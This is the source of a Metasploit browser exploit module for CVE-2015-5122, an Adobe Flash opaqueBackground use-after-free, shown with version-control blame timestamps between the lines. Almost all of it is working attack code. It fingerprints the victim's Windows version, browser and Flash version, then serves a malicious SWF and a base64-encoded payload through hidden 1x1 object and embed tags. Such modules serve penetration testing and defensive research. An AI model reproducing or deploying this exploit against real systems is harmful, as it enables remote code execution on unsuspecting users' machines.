Files
metasploit-gs/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
T

145 lines
5.2 KiB
Ruby
Raw Normal View History

2015-07-11 00:28:55 -05:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2015-07-11 00:28:55 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2015-07-17 16:23:27 -05:00
Rank = GreatRanking
2015-07-11 00:28:55 -05:00
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash opaqueBackground Use After Free',
'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
2015-07-20 16:36:47 -05:00
discovered by Hacking Team and made public as part of the July 2015 data leak, was
2015-07-11 00:28:55 -05:00
described as an Use After Free while handling the opaqueBackground property
2015-07-11 00:56:18 -05:00
7 setter of the flash.display.DisplayObject class. This module is an early release
tested on:
2015-07-11 00:28:55 -05:00
2015-07-17 16:23:00 -05:00
Windows XP SP3, IE8 and Flash 18.0.0.194,
Windows XP SP3, IE 8 and Flash 18.0.0.203,
Windows XP SP3, Firefox and Flash 18.0.0.203,
Windows Vista SP2 + IE 9 and Flash 18.0.0.203,
Windows Vista SP2 + Firefox 39.0 and Flash 18.0.0.203,
2015-07-11 00:28:55 -05:00
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
2015-07-11 01:36:26 -05:00
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
2017-08-28 20:17:58 -04:00
Windows 7 SP1 (32-bit), IE9 and Adobe Flash 18.0.0.203,
2015-07-17 16:23:00 -05:00
Windows 7 SP1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
2015-07-16 14:56:32 -05:00
Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194
Windows 10 Build 10240 (32-bit) IE11, Firefox 39.0 and Adobe Flash 18.0.0.203
2015-07-11 00:28:55 -05:00
},
'License' => MSF_LICENSE,
'Author' =>
[
2015-07-11 01:38:21 -05:00
'Unknown', # Vulnerability discovered on HackingTeam info leak
'juan vazquez', # Ported to Msf
'sinn3r' # Testing and some editing
2015-07-11 00:28:55 -05:00
],
'References' =>
[
['CVE', '2015-5122'],
2015-07-16 14:56:32 -05:00
['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-04.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-18.html']
2015-07-11 00:28:55 -05:00
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
2015-07-17 16:23:00 -05:00
os =~ OperatingSystems::Match::WINDOWS_XP ||
os =~ OperatingSystems::Match::WINDOWS_VISTA ||
2015-07-11 01:33:23 -05:00
os =~ OperatingSystems::Match::WINDOWS_7 ||
2019-06-03 16:17:23 +09:00
os =~ OperatingSystems::Match::WINDOWS_81 ||
os =~ OperatingSystems::Match::WINDOWS_10
2015-07-11 00:28:55 -05:00
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.203')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 06 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
2015-07-16 14:56:32 -05:00
platform_id = 'win'
2015-07-11 00:28:55 -05:00
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
2015-07-16 14:56:32 -05:00
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
2015-07-11 00:28:55 -05:00
<param name="Play" value="true" />
2015-07-16 14:56:32 -05:00
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
2015-07-11 00:28:55 -05:00
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5122', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end